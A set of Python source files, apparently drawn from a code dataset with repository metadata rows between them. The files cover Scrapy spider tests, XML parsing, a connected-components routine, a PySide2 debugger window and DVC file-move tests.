            def closed(self, reason):
                self.closed_called = True

        crawler = get_crawler()
        spider = TestSpider.from_crawler(crawler, 'example.com')
        crawler.signals.send_catch_log(signal=signals.spider_opened,
                                       spider=spider)
        crawler.signals.send_catch_log(signal=signals.spider_closed,
                                       spider=spider, reason=None)
        self.assertTrue(spider.closed_called)

    def test_update_settings(self):
        spider_settings = {'TEST1': 'spider', 'TEST2': 'spider'}
        project_settings = {'TEST1': 'project', 'TEST3': 'project'}
        previous_settings = self.spider_class.custom_settings
        self.spider_class.custom_settings = spider_settings
        try:
            settings = Settings(project_settings, priority='project')
            self.spider_class.update_settings(settings)
            self.assertEqual(settings.get('TEST1'), 'spider')
            self.assertEqual(settings.get('TEST2'), 'spider')
            self.assertEqual(settings.get('TEST3'), 'project')
        finally:
            # Restore the class attribute: spider_class is shared with the
            # subclasses of this test case, so leaking custom_settings here
            # would bleed into unrelated tests.
            self.spider_class.custom_settings = previous_settings

    def test_logger(self):
        spider = self.spider_class('example.com')
        with LogCapture() as log_capture:
            spider.logger.info('test log msg')
            log_capture.check(('example.com', 'INFO', 'test log msg'))

        record = log_capture.records[0]
        self.assertIn('spider', record.__dict__)
        self.assertIs(record.spider, spider)

    def test_log(self):
        spider = self.spider_class('example.com')
        with mock.patch('scrapy.spiders.Spider.logger') as mock_logger:
            spider.log('test log msg', 'INFO')
            mock_logger.log.assert_called_once_with('INFO', 'test log msg')
class InitSpiderTest(SpiderTest):
    """Re-run the base SpiderTest suite against InitSpider."""
    spider_class = InitSpider
class XMLFeedSpiderTest(SpiderTest):
    """Re-run the base suite against XMLFeedSpider plus namespace handling."""

    spider_class = XMLFeedSpider

    def test_register_namespace(self):
        # NOTE(review): the fixture deliberately closes <x:loc>/<y:updated>
        # with non-namespaced tags (</loc>, </updated>) — presumably probing
        # parser leniency; confirm before "fixing" the XML.
        body = b"""<?xml version="1.0" encoding="UTF-8"?>
            <urlset xmlns:x="http://www.google.com/schemas/sitemap/0.84"
                    xmlns:y="http://www.example.com/schemas/extras/1.0">
            <url><x:loc>http://www.example.com/Special-Offers.html</loc><y:updated>2009-08-16</updated><other value="bar" y:custom="fuu"/></url>
            <url><loc>http://www.example.com/</loc><y:updated>2009-08-16</updated><other value="foo"/></url>
            </urlset>"""
        response = XmlResponse(url='http://example.com/sitemap.xml', body=body)

        class _XMLSpider(self.spider_class):
            itertag = 'url'
            # Map local prefixes (a, b) onto the URIs used by the fixture (x, y).
            namespaces = (
                ('a', 'http://www.google.com/schemas/sitemap/0.84'),
                ('b', 'http://www.example.com/schemas/extras/1.0'),
            )

            def parse_node(self, response, selector):
                yield {
                    'loc': selector.xpath('a:loc/text()').getall(),
                    'updated': selector.xpath('b:updated/text()').getall(),
                    'other': selector.xpath('other/@value').getall(),
                    'custom': selector.xpath('other/@b:custom').getall(),
                }

        # Both node iterators must produce identical results.
        for iterator in ('iternodes', 'xml'):
            spider = _XMLSpider('example', iterator=iterator)
            output = list(spider.parse(response))
            self.assertEqual(len(output), 2, iterator)
            self.assertEqual(output, [
                {'loc': [u'http://www.example.com/Special-Offers.html'],
                 'updated': [u'2009-08-16'],
                 'custom': [u'fuu'],
                 'other': [u'bar']},
                {'loc': [],
                 'updated': [u'2009-08-16'],
                 'other': [u'foo'],
                 'custom': []},
            ], iterator)
class CSVFeedSpiderTest(SpiderTest):
    """Re-run the base SpiderTest suite against CSVFeedSpider."""
    spider_class = CSVFeedSpider
class CrawlSpiderTest(SpiderTest):
    """Tests for CrawlSpider's rule/link-following machinery."""

    # Shared HTML fixture: one relative link, one absolute-path link, and a
    # "nofollow" page used by the filtering test.
    test_body = b"""<html><head><title>Page title<title>
    <body>
    <p><a href="item/12.html">Item 12</a></p>
    <div class='links'>
    <p><a href="/about.html">About us</a></p>
    </div>
    <div>
    <p><a href="/nofollow.html">This shouldn't be followed</a></p>
    </div>
    </body></html>"""

    spider_class = CrawlSpider

    def test_process_links(self):
        # A pass-through process_links keeps all three extracted links.
        response = HtmlResponse("http://example.org/somepage/index.html",
                                body=self.test_body)

        class _CrawlSpider(self.spider_class):
            name="test"
            allowed_domains=['example.org']
            rules = (
                Rule(LinkExtractor(), process_links="dummy_process_links"),
            )

            def dummy_process_links(self, links):
                return links

        spider = _CrawlSpider()
        output = list(spider._requests_to_follow(response))
        self.assertEqual(len(output), 3)
        self.assertTrue(all(map(lambda r: isinstance(r, Request), output)))
        self.assertEqual([r.url for r in output],
                         ['http://example.org/somepage/item/12.html',
                          'http://example.org/about.html',
                          'http://example.org/nofollow.html'])

    def test_process_links_filter(self):
        # process_links may drop links; the "nofollow" URL is filtered out.
        response = HtmlResponse("http://example.org/somepage/index.html",
                                body=self.test_body)

        class _CrawlSpider(self.spider_class):
            import re
            name="test"
            allowed_domains=['example.org']
            rules = (
                Rule(LinkExtractor(), process_links="filter_process_links"),
            )
            _test_regex = re.compile('nofollow')
            def filter_process_links(self, links):
                return [link for link in links
                        if not self._test_regex.search(link.url)]

        spider = _CrawlSpider()
        output = list(spider._requests_to_follow(response))
        self.assertEqual(len(output), 2)
        self.assertTrue(all(map(lambda r: isinstance(r, Request), output)))
        self.assertEqual([r.url for r in output],
                         ['http://example.org/somepage/item/12.html',
                          'http://example.org/about.html'])

    def test_process_links_generator(self):
        # process_links may also be a generator; results are identical to the
        # list-returning variant.
        response = HtmlResponse("http://example.org/somepage/index.html",
                                body=self.test_body)

        class _CrawlSpider(self.spider_class):
            name="test"
            allowed_domains=['example.org']
            rules = (
                Rule(LinkExtractor(), process_links="dummy_process_links"),
            )

            def dummy_process_links(self, links):
                for link in links:
                    yield link

        spider = _CrawlSpider()
        output = list(spider._requests_to_follow(response))
        self.assertEqual(len(output), 3)
        self.assertTrue(all(map(lambda r: isinstance(r, Request), output)))
        self.assertEqual([r.url for r in output],
                         ['http://example.org/somepage/item/12.html',
                          'http://example.org/about.html',
                          'http://example.org/nofollow.html'])

    def test_follow_links_attribute_population(self):
        # _follow_links mirrors the CRAWLSPIDER_FOLLOW_LINKS setting.
        crawler = get_crawler()
        spider = self.spider_class.from_crawler(crawler, 'example.com')
        self.assertTrue(hasattr(spider, '_follow_links'))
        self.assertTrue(spider._follow_links)

        settings_dict = {'CRAWLSPIDER_FOLLOW_LINKS': False}
        crawler = get_crawler(settings_dict=settings_dict)
        spider = self.spider_class.from_crawler(crawler, 'example.com')
        self.assertTrue(hasattr(spider, '_follow_links'))
        self.assertFalse(spider._follow_links)

    def test_follow_links_attribute_deprecated_population(self):
        # Same behaviour via the deprecated set_crawler() path (intentional
        # use of the deprecated API).
        spider = self.spider_class('example.com')
        self.assertFalse(hasattr(spider, '_follow_links'))

        spider.set_crawler(get_crawler())
        self.assertTrue(hasattr(spider, '_follow_links'))
        self.assertTrue(spider._follow_links)

        spider = self.spider_class('example.com')
        settings_dict = {'CRAWLSPIDER_FOLLOW_LINKS': False}
        spider.set_crawler(get_crawler(settings_dict=settings_dict))
        self.assertTrue(hasattr(spider, '_follow_links'))
        self.assertFalse(spider._follow_links)
class SitemapSpiderTest(SpiderTest):
    """Tests for SitemapSpider's sitemap body extraction and URL parsing."""

    spider_class = SitemapSpider

    BODY = b"SITEMAP"
    # Build a gzip-compressed copy of BODY once at class-definition time.
    f = BytesIO()
    g = gzip.GzipFile(fileobj=f, mode='w+b')
    g.write(BODY)
    g.close()
    GZBODY = f.getvalue()

    def assertSitemapBody(self, response, body):
        # Helper: _get_sitemap_body returns the decoded body, or None when
        # the response is not recognised as a sitemap.
        spider = self.spider_class("example.com")
        self.assertEqual(spider._get_sitemap_body(response), body)

    def test_get_sitemap_body(self):
        r = XmlResponse(url="http://www.example.com/", body=self.BODY)
        self.assertSitemapBody(r, self.BODY)

        # HTML and generic (non-XML) responses are rejected.
        r = HtmlResponse(url="http://www.example.com/", body=self.BODY)
        self.assertSitemapBody(r, None)

        r = Response(url="http://www.example.com/favicon.ico", body=self.BODY)
        self.assertSitemapBody(r, None)

    def test_get_sitemap_body_gzip_headers(self):
        # Compressed body advertised via Content-Type is decompressed.
        r = Response(url="http://www.example.com/sitemap", body=self.GZBODY,
                     headers={"content-type": "application/gzip"})
        self.assertSitemapBody(r, self.BODY)

    def test_get_sitemap_body_xml_url(self):
        r = TextResponse(url="http://www.example.com/sitemap.xml", body=self.BODY)
        self.assertSitemapBody(r, self.BODY)

    def test_get_sitemap_body_xml_url_compressed(self):
        r = Response(url="http://www.example.com/sitemap.xml.gz", body=self.GZBODY)
        self.assertSitemapBody(r, self.BODY)

        # .xml.gz but body decoded by HttpCompression middleware already
        r = Response(url="http://www.example.com/sitemap.xml.gz", body=self.BODY)
        self.assertSitemapBody(r, self.BODY)

    def test_get_sitemap_urls_from_robotstxt(self):
        # Sitemap directives in robots.txt are extracted; relative URLs are
        # resolved against the robots.txt URL, and scheme case is normalised.
        robots = b"""# Sitemap files
Sitemap: http://example.com/sitemap.xml
Sitemap: http://example.com/sitemap-product-index.xml
Sitemap: HTTP://example.com/sitemap-uppercase.xml
Sitemap: /sitemap-relative-url.xml
"""

        r = TextResponse(url="http://www.example.com/robots.txt", body=robots)
        spider = self.spider_class("example.com")
        self.assertEqual([req.url for req in spider._parse_sitemap(r)],
                         ['http://example.com/sitemap.xml',
                          'http://example.com/sitemap-product-index.xml',
                          'http://example.com/sitemap-uppercase.xml',
                          'http://www.example.com/sitemap-relative-url.xml'])

    def test_alternate_url_locs(self):
        # xhtml:link alternates are ignored by default and followed only when
        # sitemap_alternate_links is enabled; links without href are skipped.
        sitemap = b"""<?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
            xmlns:xhtml="http://www.w3.org/1999/xhtml">
        <url>
            <loc>http://www.example.com/english/</loc>
            <xhtml:link rel="alternate" hreflang="de"
                        href="http://www.example.com/deutsch/"/>
            <xhtml:link rel="alternate" hreflang="de-ch"
                        href="http://www.example.com/schweiz-deutsch/"/>
            <xhtml:link rel="alternate" hreflang="it"
                        href="http://www.example.com/italiano/"/>
            <xhtml:link rel="alternate" hreflang="it"/><!-- wrong tag without href -->
        </url>
    </urlset>"""
        r = TextResponse(url="http://www.example.com/sitemap.xml", body=sitemap)
        spider = self.spider_class("example.com")
        self.assertEqual([req.url for req in spider._parse_sitemap(r)],
                         ['http://www.example.com/english/'])

        spider.sitemap_alternate_links = True
        self.assertEqual([req.url for req in spider._parse_sitemap(r)],
                         ['http://www.example.com/english/',
                          'http://www.example.com/deutsch/',
                          'http://www.example.com/schweiz-deutsch/',
                          'http://www.example.com/italiano/'])
class DeprecationTest(unittest.TestCase):
    """Checks the deprecated BaseSpider alias and make_requests_from_url."""

    def test_basespider_is_deprecated(self):
        with warnings.catch_warnings(record=True) as w:

            class MySpider1(BaseSpider):
                pass

        self.assertEqual(len(w), 1)
        self.assertEqual(w[0].category, ScrapyDeprecationWarning)
        # The warning must point at the subclass definition line.
        self.assertEqual(w[0].lineno, inspect.getsourcelines(MySpider1)[1])

    def test_basespider_issubclass(self):
        # Spider subclasses still count as BaseSpider subclasses; unrelated
        # classes (plain object or object_ref) do not.
        class MySpider2(Spider):
            pass

        class MySpider2a(MySpider2):
            pass

        class Foo(object):
            pass

        class Foo2(object_ref):
            pass

        assert issubclass(MySpider2, BaseSpider)
        assert issubclass(MySpider2a, BaseSpider)
        assert not issubclass(Foo, BaseSpider)
        assert not issubclass(Foo2, BaseSpider)

    def test_basespider_isinstance(self):
        # Same compatibility guarantee for isinstance checks.
        class MySpider3(Spider):

            name = 'myspider3'

        class MySpider3a(MySpider3):
            pass

        class Foo(object):
            pass

        class Foo2(object_ref):
            pass

        assert isinstance(MySpider3(), BaseSpider)
        assert isinstance(MySpider3a(), BaseSpider)
        assert not isinstance(Foo(), BaseSpider)
        assert not isinstance(Foo2(), BaseSpider)

    def test_crawl_spider(self):
        assert issubclass(CrawlSpider, Spider)
        assert issubclass(CrawlSpider, BaseSpider)
        assert isinstance(CrawlSpider(name='foo'), Spider)
        assert isinstance(CrawlSpider(name='foo'), BaseSpider)

    def test_make_requests_from_url_deprecated(self):
        class MySpider4(Spider):
            name = 'spider1'
            start_urls = ['http://example.com']

        class MySpider5(Spider):
            name = 'spider2'
            start_urls = ['http://example.com']

            def make_requests_from_url(self, url):
                return Request(url + "/foo", dont_filter=True)

        with warnings.catch_warnings(record=True) as w:
            # spider without overridden make_requests_from_url method
            # doesn't issue a warning
            spider1 = MySpider4()
            self.assertEqual(len(list(spider1.start_requests())), 1)
            self.assertEqual(len(w), 0)

            # spider with overridden make_requests_from_url issues a warning,
            # but the method still works
            spider2 = MySpider5()
            requests = list(spider2.start_requests())
            self.assertEqual(len(requests), 1)
            self.assertEqual(requests[0].url, 'http://example.com/foo')
            self.assertEqual(len(w), 1)
class NoParseMethodSpiderTest(unittest.TestCase):
    """Spiders without a ``parse`` callback must raise a clear error."""

    spider_class = Spider

    def test_undefined_parse_method(self):
        spider = self.spider_class('example.com')
        text = b'Random text'
        resp = TextResponse(url="http://www.example.com/random_url", body=text)

        exc_msg = 'Spider.parse callback is not defined'
        # assertRaisesRegexp is a deprecated alias (removed in Python 3.12);
        # use the modern assertRaisesRegex spelling.
        with self.assertRaisesRegex(NotImplementedError, exc_msg):
            spider.parse(resp)
| 37.936575 | 140 | 0.617198 |
595b77b6995ff118a7fe08559bea55dd7bc33191 | 482 | py | Python | test_save_search.py | Concrete18/Game-Save-Manager | 9a8040bb3c9fc97dc80ed986c79cfe1ee95d106e | [
"blessing"
] | 2 | 2020-12-23T04:18:15.000Z | 2021-12-13T10:17:56.000Z | test_save_search.py | Concrete18/Game-Save-Manager | 9a8040bb3c9fc97dc80ed986c79cfe1ee95d106e | [
"blessing"
] | null | null | null | test_save_search.py | Concrete18/Game-Save-Manager | 9a8040bb3c9fc97dc80ed986c79cfe1ee95d106e | [
"blessing"
] | null | null | null | from classes.save_search import Save_Search
from classes.game import Game
import unittest
class TestBackup(unittest.TestCase):
def test_game_save_location_search(self):
'''
Game Save Search
'''
main = Save_Search(Game, 1)
path = r'C:\Users\Michael\AppData\Local\Teardown'
main.game.set('Teardown')
self.assertIn(main.game_save_location_search('Teardown', test=1), path)
if __name__ == '__main__':
    # Allow running this test module directly, outside a test runner.
    unittest.main()
| 24.1 | 79 | 0.674274 |
29e1c7f1b3219ec989127cd227e6c50ca5a6fec2 | 775 | py | Python | NBA_SPORTSVU_SAMPLE_FILE/parsetest.py | ykataoka/NBA_TrajectoryAnalytics | 8cdbf9deb77bbd7e11e3447e968b154c967143be | [
"MIT"
] | null | null | null | NBA_SPORTSVU_SAMPLE_FILE/parsetest.py | ykataoka/NBA_TrajectoryAnalytics | 8cdbf9deb77bbd7e11e3447e968b154c967143be | [
"MIT"
] | null | null | null | NBA_SPORTSVU_SAMPLE_FILE/parsetest.py | ykataoka/NBA_TrajectoryAnalytics | 8cdbf9deb77bbd7e11e3447e968b154c967143be | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import xmltodict
import json
import glob
# xml = '''<?xml version="1.0"?>
# <root>
# <parent>
# <child a="foo">
# Hello, world!!
# </child>
# </parent>
# </root>
# '''
xmlfiles = glob.glob('*.XML')
xsdfiles = glob.glob('*.xsd')
print xmlfiles
print xsdfiles
if __name__ == '__main__':
for filename in xmlfiles:
str = open(filename, 'r').read()
result = xmltodict.parse(str)
print(json.dumps(result, indent=2))
print filename
raw_input()
for filename in xsdfiles:
str = open(filename, 'r').read()
result = xmltodict.parse(str)
print(json.dumps(result, indent=2))
print filename
raw_input()
# print(result)
| 19.375 | 43 | 0.565161 |
a31bf0ff37b55d3780d4f45ff3d2151f304be97f | 1,329 | py | Python | algorithmic_heights/cc/cc_logic.py | ivanyu/rosalind | b3d05347401d261bb146eef0f4c75d84562d54b0 | [
"MIT"
] | 1 | 2019-09-24T15:57:09.000Z | 2019-09-24T15:57:09.000Z | algorithmic_heights/cc/cc_logic.py | ivanyu/rosalind | b3d05347401d261bb146eef0f4c75d84562d54b0 | [
"MIT"
] | null | null | null | algorithmic_heights/cc/cc_logic.py | ivanyu/rosalind | b3d05347401d261bb146eef0f4c75d84562d54b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def cc(graph):
    """Return the number of connected components of an undirected graph.

    :param graph: adjacency list; ``graph[v]`` is an iterable with the
        neighbours of vertex ``v``, vertices being ``0 .. len(graph)-1``.
    :return: number of connected components (0 for an empty graph).
    """
    visited = set()
    count = 0
    for start in range(len(graph)):
        if start in visited:
            continue
        # Iterative DFS with an explicit stack: avoids the RecursionError
        # that the previous recursive traversal hit on long path-like graphs.
        visited.add(start)
        stack = [start]
        while stack:
            u = stack.pop()
            for v in graph[u]:
                if v not in visited:
                    visited.add(v)
                    stack.append(v)
        count += 1
    return count
if __name__ == "__main__":
import unittest
class ConnectedComponentsTestCase(unittest.TestCase):
def test_empty_graph(self):
graph = []
self.assertEqual(cc(graph), 0)
def test_one_vertex_graph(self):
graph = [[]]
self.assertEqual(cc(graph), 1)
def test_line(self):
graph = [
[1],
[0, 2],
[2, 3],
[],
]
self.assertEqual(cc(graph), 1)
def test_not_connected(self):
n = 6
graph = [[] for _ in range(n)]
self.assertEqual(cc(graph), 6)
def test_big_and_one_vertex(self):
graph = [
[1, 2],
[0, 2],
[0, 1],
[]
]
self.assertEqual(cc(graph), 2)
unittest.main()
| 22.913793 | 57 | 0.453725 |
04095fd7685da05bf5b642d34c7ea00262d5d14f | 4,875 | py | Python | qtUI/debugWindow.py | jupiterbjy/python-macro-practice | 13dec1a7d85ea7abed0ac5d42327a04a6b48a7c4 | [
"MIT"
] | 2 | 2020-10-16T23:20:27.000Z | 2021-10-11T19:55:45.000Z | qtUI/debugWindow.py | jupiterbjy/python-macro-practice | 13dec1a7d85ea7abed0ac5d42327a04a6b48a7c4 | [
"MIT"
] | null | null | null | qtUI/debugWindow.py | jupiterbjy/python-macro-practice | 13dec1a7d85ea7abed0ac5d42327a04a6b48a7c4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'debugWindow.ui'
##
## Created by: Qt User Interface Compiler version 5.14.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (QCoreApplication, QDate, QDateTime, QMetaObject,
QObject, QPoint, QRect, QSize, QTime, QUrl, Qt)
from PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont,
QFontDatabase, QIcon, QKeySequence, QLinearGradient, QPalette, QPainter,
QPixmap, QRadialGradient)
from PySide2.QtWidgets import *
class Ui_DebugWindow(object):
    """Auto-generated (Qt uic) UI scaffolding for the debugger window.

    Do not hand-edit widget setup here: this file is regenerated from
    debugWindow.ui and manual changes will be lost (see header warning).
    Builds a checkbox plus a two-tab widget (Log / Debug), where the Debug
    tab adds a command-input line under its output view.
    """
    def setupUi(self, DebugWindow):
        if not DebugWindow.objectName():
            DebugWindow.setObjectName(u"DebugWindow")
        DebugWindow.resize(683, 457)
        self.verticalLayout = QVBoxLayout(DebugWindow)
        self.verticalLayout.setObjectName(u"verticalLayout")
        self.logSaveCheck = QCheckBox(DebugWindow)
        self.logSaveCheck.setObjectName(u"logSaveCheck")

        self.verticalLayout.addWidget(self.logSaveCheck)

        self.tabWidget = QTabWidget(DebugWindow)
        self.tabWidget.setObjectName(u"tabWidget")
        self.Log = QWidget()
        self.Log.setObjectName(u"Log")
        self.verticalLayout_3 = QVBoxLayout(self.Log)
        self.verticalLayout_3.setObjectName(u"verticalLayout_3")
        self.logOutput = QTextEdit(self.Log)
        self.logOutput.setObjectName(u"logOutput")
        self.logOutput.setStyleSheet(u"background-color: rgb(30, 30, 30);\n"
"color: rgb(230, 230, 230);\n"
"selection-color: rgb(30, 30, 30);\n"
"selection-background-color: rgb(30, 30, 30);\n"
"gridline-color: rgb(30, 30, 30);")
        self.logOutput.setFrameShape(QFrame.NoFrame)
        self.logOutput.setUndoRedoEnabled(False)
        self.logOutput.setReadOnly(True)

        self.verticalLayout_3.addWidget(self.logOutput)

        self.tabWidget.addTab(self.Log, "")
        self.Debug = QWidget()
        self.Debug.setObjectName(u"Debug")
        self.verticalLayout_2 = QVBoxLayout(self.Debug)
        self.verticalLayout_2.setObjectName(u"verticalLayout_2")
        self.debugOutput = QTextEdit(self.Debug)
        self.debugOutput.setObjectName(u"debugOutput")
        self.debugOutput.setStyleSheet(u"background-color: rgb(30, 30, 30);\n"
"color: rgb(230, 230, 230);\n"
"selection-color: rgb(30, 30, 30);\n"
"selection-background-color: rgb(30, 30, 30);\n"
"gridline-color: rgb(30, 30, 30);")
        self.debugOutput.setFrameShape(QFrame.NoFrame)
        self.debugOutput.setUndoRedoEnabled(False)
        self.debugOutput.setReadOnly(True)

        self.verticalLayout_2.addWidget(self.debugOutput)

        self.commandLine = QLineEdit(self.Debug)
        self.commandLine.setObjectName(u"commandLine")
        sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.commandLine.sizePolicy().hasHeightForWidth())
        self.commandLine.setSizePolicy(sizePolicy)
        self.commandLine.setMinimumSize(QSize(0, 22))
        self.commandLine.setCursor(QCursor(Qt.IBeamCursor))
        self.commandLine.setStyleSheet(u"background-color: rgb(30, 30, 30);\n"
"color: rgb(230, 230, 230);\n"
"selection-color: rgb(30, 30, 30);\n"
"selection-background-color: rgb(30, 30, 30);\n"
"gridline-color: rgb(30, 30, 30);")
        self.commandLine.setFrame(False)
        self.commandLine.setClearButtonEnabled(False)

        self.verticalLayout_2.addWidget(self.commandLine)

        self.tabWidget.addTab(self.Debug, "")

        self.verticalLayout.addWidget(self.tabWidget)

        self.retranslateUi(DebugWindow)

        self.tabWidget.setCurrentIndex(0)

        QMetaObject.connectSlotsByName(DebugWindow)
    # setupUi

    def retranslateUi(self, DebugWindow):
        DebugWindow.setWindowTitle(QCoreApplication.translate("DebugWindow", u"Debugger", None))
        self.logSaveCheck.setText(QCoreApplication.translate("DebugWindow", u"Save to file on Exit", None))
        self.logOutput.setPlaceholderText(QCoreApplication.translate("DebugWindow", u"Standby..", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.Log), QCoreApplication.translate("DebugWindow", u"Log", None))
        self.debugOutput.setPlaceholderText(QCoreApplication.translate("DebugWindow", u"Standby..", None))
        self.commandLine.setInputMask("")
        self.commandLine.setPlaceholderText(QCoreApplication.translate("DebugWindow", u"type 'help' for commands..", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.Debug), QCoreApplication.translate("DebugWindow", u"Debug", None))
    # retranslateUi
| 43.918919 | 128 | 0.686769 |
aad2003a562d6e0dad363875fcaabbe304ed081a | 8,297 | py | Python | tests/func/test_move.py | itcarroll/dvc | 55219e9089005ac15d668ecf735aeaf31a771d0b | [
"Apache-2.0"
] | 1 | 2022-03-16T13:27:40.000Z | 2022-03-16T13:27:40.000Z | tests/func/test_move.py | itcarroll/dvc | 55219e9089005ac15d668ecf735aeaf31a771d0b | [
"Apache-2.0"
] | 41 | 2021-11-16T15:38:50.000Z | 2022-03-30T10:32:14.000Z | tests/func/test_move.py | jhhuh/dvc | fecc81e951efeaa8130264f726c27e92876422ae | [
"Apache-2.0"
] | null | null | null | import os
import textwrap
import pytest
from dvc.cli import main
from dvc.dvcfile import DVC_FILE_SUFFIX
from dvc.exceptions import DvcException, MoveNotDataSourceError
from dvc.utils.serialize import load_yaml
from tests.basic_env import TestDvc, TestDvcGit
from tests.func.test_repro import TestRepro
from tests.utils import cd
class TestMove(TestDvc):
    def test(self):
        """dvc.move relocates the data file of a tracked target."""
        target = self.FOO + "1"
        self.dvc.add(self.FOO)
        self.dvc.move(self.FOO, target)
        self.assertFalse(os.path.isfile(self.FOO))
        self.assertTrue(os.path.isfile(target))
class TestMoveNonExistentFile(TestDvc):
    def test(self):
        """Moving a path that was never tracked raises DvcException."""
        self.assertRaises(
            DvcException, self.dvc.move, "non_existent_file", "dst"
        )
class TestMoveDirectory(TestDvc):
    def test(self):
        """A tracked directory can be moved as a single unit."""
        destination = "dst"
        stages = self.dvc.add(self.DATA_DIR)
        self.assertEqual(len(stages), 1)
        self.assertIsNotNone(stages[0])

        self.dvc.move(self.DATA_DIR, destination)

        self.assertFalse(os.path.exists(self.DATA_DIR))
        self.assertTrue(os.path.exists(destination))
class TestCmdMove(TestDvc):
    def test(self):
        """`dvc move` CLI succeeds for tracked files and fails otherwise."""
        stages = self.dvc.add(self.FOO)
        self.assertEqual(len(stages), 1)
        self.assertIsNotNone(stages[0])

        self.assertEqual(0, main(["move", self.FOO, self.FOO + "1"]))
        self.assertNotEqual(0, main(["move", "non-existing-file", "dst"]))
class TestMoveNotDataSource(TestRepro):
    def test(self):
        """Moving a pipeline output (not a plain data source) must fail,
        both through the API and through the CLI."""
        from dvc.repo import Repo as DvcRepo

        # Re-open the repo prepared by the TestRepro fixture.
        self.dvc = DvcRepo(self._root_dir)
        with self.assertRaises(MoveNotDataSourceError):
            self.dvc.move(self.file1, "dst")

        ret = main(["move", self.file1, "dst"])
        self.assertNotEqual(ret, 0)
class TestMoveFileWithExtension(TestDvc):
    def test(self):
        """Moving keeps the extension and renames the .dvc file too."""
        csv_path = os.path.join(self.dvc.root_dir, "file.csv")
        with open(csv_path, "w", encoding="utf-8") as fobj:
            fobj.write("1,2,3\n")

        self.dvc.add("file.csv")
        self.assertTrue(os.path.exists("file.csv"))
        self.assertTrue(os.path.exists("file.csv.dvc"))

        self.assertEqual(0, main(["move", "file.csv", "other_name.csv"]))

        self.assertFalse(os.path.exists("file.csv"))
        self.assertFalse(os.path.exists("file.csv.dvc"))
        self.assertTrue(os.path.exists("other_name.csv"))
        self.assertTrue(os.path.exists("other_name.csv.dvc"))
class TestMoveFileToDirectory(TestDvc):
    def test(self):
        """Moving a file into a directory carries its .dvc file along."""
        src_stage = self.FOO + DVC_FILE_SUFFIX
        self.assertEqual(0, main(["add", self.FOO]))
        self.assertTrue(os.path.exists(src_stage))

        dst_path = os.path.join(self.DATA_DIR, self.FOO)
        dst_stage = dst_path + DVC_FILE_SUFFIX
        self.assertEqual(0, main(["move", self.FOO, dst_path]))

        self.assertFalse(os.path.exists(self.FOO))
        self.assertFalse(os.path.exists(src_stage))
        self.assertTrue(os.path.exists(dst_path))
        self.assertTrue(os.path.exists(dst_stage))
class TestMoveFileToDirectoryWithoutSpecifiedTargetName(TestDvc):
    def test(self):
        """When the destination is a directory, the source file name is
        kept and the stage file's `outs` path is rewritten accordingly."""
        foo_stage_file_path = self.FOO + DVC_FILE_SUFFIX
        ret = main(["add", self.FOO])
        self.assertEqual(ret, 0)
        self.assertTrue(os.path.exists(foo_stage_file_path))

        target_foo_path = os.path.join(self.DATA_DIR, self.FOO)
        target_foo_stage_file_path = target_foo_path + DVC_FILE_SUFFIX

        ret = main(["move", self.FOO, self.DATA_DIR])
        self.assertEqual(ret, 0)

        self.assertFalse(os.path.exists(self.FOO))
        self.assertFalse(os.path.exists(foo_stage_file_path))

        self.assertTrue(os.path.exists(target_foo_path))
        self.assertTrue(os.path.exists(target_foo_stage_file_path))

        # The out path stored in the stage file is relative to the stage.
        new_stage = load_yaml(target_foo_stage_file_path)
        self.assertEqual(self.FOO, new_stage["outs"][0]["path"])
class TestMoveDirectoryShouldNotOverwriteExisting(TestDvcGit):
    def test(self):
        """Moving a tracked directory into an existing directory nests it
        (mv-like semantics) instead of replacing the destination."""
        dir_name = "dir"
        orig_listdir = set(os.listdir(self.DATA_DIR))

        self.dvc.add(self.DATA_DIR)

        os.mkdir(dir_name)
        new_dir_name = os.path.join(dir_name, self.DATA_DIR)

        self.dvc.move(self.DATA_DIR, dir_name)

        data_dir_stage = self.DATA_DIR + DVC_FILE_SUFFIX
        self.assertFalse(os.path.exists(self.DATA_DIR))
        self.assertFalse(os.path.exists(data_dir_stage))

        self.assertTrue(os.path.exists(dir_name))
        # .gitignore was produced by `dvc add` and moves with the data.
        self.assertEqual(
            set(os.listdir(dir_name)),
            {".gitignore", data_dir_stage, self.DATA_DIR},
        )

        self.assertTrue(os.path.exists(new_dir_name))
        self.assertTrue(os.path.isfile(new_dir_name + DVC_FILE_SUFFIX))
        self.assertEqual(set(os.listdir(new_dir_name)), orig_listdir)
class TestMoveFileBetweenDirectories(TestDvc):
    def test(self):
        """Moving a file across directories relocates both data and stage
        file and rewrites the stage's out path."""
        data_stage_file = self.DATA + DVC_FILE_SUFFIX
        ret = main(["add", self.DATA])
        self.assertEqual(ret, 0)
        self.assertTrue(os.path.exists(data_stage_file))

        new_data_dir = "data_dir2"
        os.makedirs(new_data_dir)

        ret = main(["move", self.DATA, new_data_dir])
        self.assertEqual(ret, 0)

        new_data_path = os.path.join(new_data_dir, os.path.basename(self.DATA))
        new_data_stage_file = new_data_path + DVC_FILE_SUFFIX

        self.assertFalse(os.path.exists(self.DATA))
        self.assertFalse(os.path.exists(data_stage_file))

        self.assertTrue(os.path.exists(new_data_path))
        self.assertTrue(os.path.exists(new_data_stage_file))

        # Out path is stored relative to the stage file's directory.
        new_stage_file = load_yaml(new_data_stage_file)
        self.assertEqual(
            os.path.basename(self.DATA), new_stage_file["outs"][0]["path"]
        )
class TestMoveFileInsideDirectory(TestDvc):
    def test(self):
        """`dvc move` works with paths relative to a subdirectory."""
        self.assertEqual(0, main(["add", self.DATA]))

        with cd(self.DATA_DIR):
            self.assertEqual(
                0, main(["move", os.path.basename(self.DATA), "data.txt"])
            )

        self.assertFalse(os.path.exists(self.DATA))

        moved_data = os.path.join(self.DATA_DIR, "data.txt")
        moved_stage = os.path.join(self.DATA_DIR, "data.txt.dvc")
